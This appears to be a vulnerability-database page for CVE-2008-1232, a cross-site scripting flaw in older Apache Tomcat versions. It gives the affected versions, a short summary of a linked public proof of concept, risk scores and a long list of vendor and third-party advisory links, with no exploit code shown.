CVE-2008-1232

Apache Tomcat 4.1.0-4.1.37, 5.5.0-5.5.26, 6.0.0-6.0.16 - Cross-Site Scripting via HttpServletResponse.sendError

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 1 public exploit for CVE-2008-1232. PoCs published by Konstantin Kolinko.

AI-analyzed exploit summary This exploit demonstrates a cross-site scripting (XSS) vulnerability in Apache Tomcat by injecting a malicious script into an HTTP 403 error response. The payload uses Unicode characters to bypass input sanitization and execute arbitrary JavaScript in the context of the affected site.

Description

Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.

Exploits (1)

exploitdb WORKING POC VERIFIED
by Konstantin Kolinko · textremotemultiple
https://www.exploit-db.com/exploits/32138

This exploit demonstrates a cross-site scripting (XSS) vulnerability in Apache Tomcat by injecting a malicious script into an HTTP 403 error response. The payload uses Unicode characters to bypass input sanitization and execute arbitrary JavaScript in the context of the affected site.

Classification
Working Poc 90%
Attack Type
Xss
Complexity
Trivial
Reliability
Reliable
Target: Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, 6.0.0 through 6.0.16
No auth needed
Prerequisites: Access to a vulnerable Apache Tomcat instance · Ability to send crafted HTTP requests
MITRE ATT&CK
devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (64)

Core 64
Core References
Third Party Advisory vendor-advisory x_refsource_fedora
https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00889.html
Third Party Advisory vendor-advisory x_refsource_fedora
https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00712.html
Third Party Advisory vendor-advisory x_refsource_fedora
https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00859.html
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2009/3316
Third Party Advisory, VDB Entry vdb-entry x_refsource_sectrack
http://www.securitytracker.com/id?1020622
Vendor Advisory x_refsource_confirm
http://tomcat.apache.org/security-4.html
Third Party Advisory vendor-advisory x_refsource_redhat
http://www.redhat.com/support/errata/RHSA-2008-0862.html
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2009/1609
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2009/2194
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/34013
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2008/2823
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/37460
Third Party Advisory x_refsource_confirm
http://www.vmware.com/security/advisories/VMSA-2009-0002.html
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/31982
Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/31681
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/32120
Third Party Advisory x_refsource_confirm
http://www.vmware.com/security/advisories/VMSA-2009-0016.html
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/33999
Exploit, Patch, Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/30496
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/31865
Third Party Advisory third-party-advisory x_refsource_sreason
http://securityreason.com/securityalert/4098
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/31639
Third Party Advisory vendor-advisory x_refsource_suse
http://lists.opensuse.org/opensuse-security-announce/2008-09/msg00004.html
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/36108
Third Party Advisory vendor-advisory x_refsource_mandriva
http://www.mandriva.com/security/advisories?name=MDVSA-2008:188
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/31379
Third Party Advisory x_refsource_confirm
http://support.avaya.com/elmodocs2/security/ASA-2008-401.htm
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2009/0320
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/507985/100/0/threaded
Third Party Advisory vendor-advisory x_refsource_redhat
http://www.redhat.com/support/errata/RHSA-2008-0864.html
Third Party Advisory vendor-advisory x_refsource_suse
http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html
Vendor Advisory x_refsource_confirm
http://tomcat.apache.org/security-6.html
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/57126
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/32222
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/31891
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/33797
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/505556/100/0/threaded
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2008/2305
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/504351/100/0/threaded
Vendor Advisory x_refsource_confirm
http://tomcat.apache.org/security-5.html
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/35474
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2008/2780
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/31381
Mailing List, Third Party Advisory vendor-advisory x_refsource_hp
http://marc.info/?l=bugtraq&m=123376588623823&w=2
Mailing List, Third Party Advisory vendor-advisory x_refsource_hp
http://marc.info/?l=bugtraq&m=139344343412337&w=2
Mailing List, Third Party Advisory vendor-advisory x_refsource_apple
http://lists.apple.com/archives/security-announce/2008/Oct/msg00001.html
Third Party Advisory x_refsource_confirm
http://support.apple.com/kb/HT3216
URL Repurposed vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2009/0503
Third Party Advisory, VDB Entry vdb-entry x_refsource_xf
https://exchange.xforce.ibmcloud.com/vulnerabilities/44155
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/495021/100/0/threaded
Broken Link third-party-advisory x_refsource_secunia
http://secunia.com/advisories/32266
Third Party Advisory vendor-advisory x_refsource_redhat
http://www.redhat.com/support/errata/RHSA-2008-0648.html

Scores

EPSS 0.3815
EPSS Percentile 97.3%

Details

CWE
CWE-79
Status published
Products (2)
apache/tomcat 4.1.0 - 4.1.37
org.apache.tomcat/tomcat 4.1.0 - 4.1.38Maven
Published Aug 04, 2008
Tracked Since Feb 18, 2026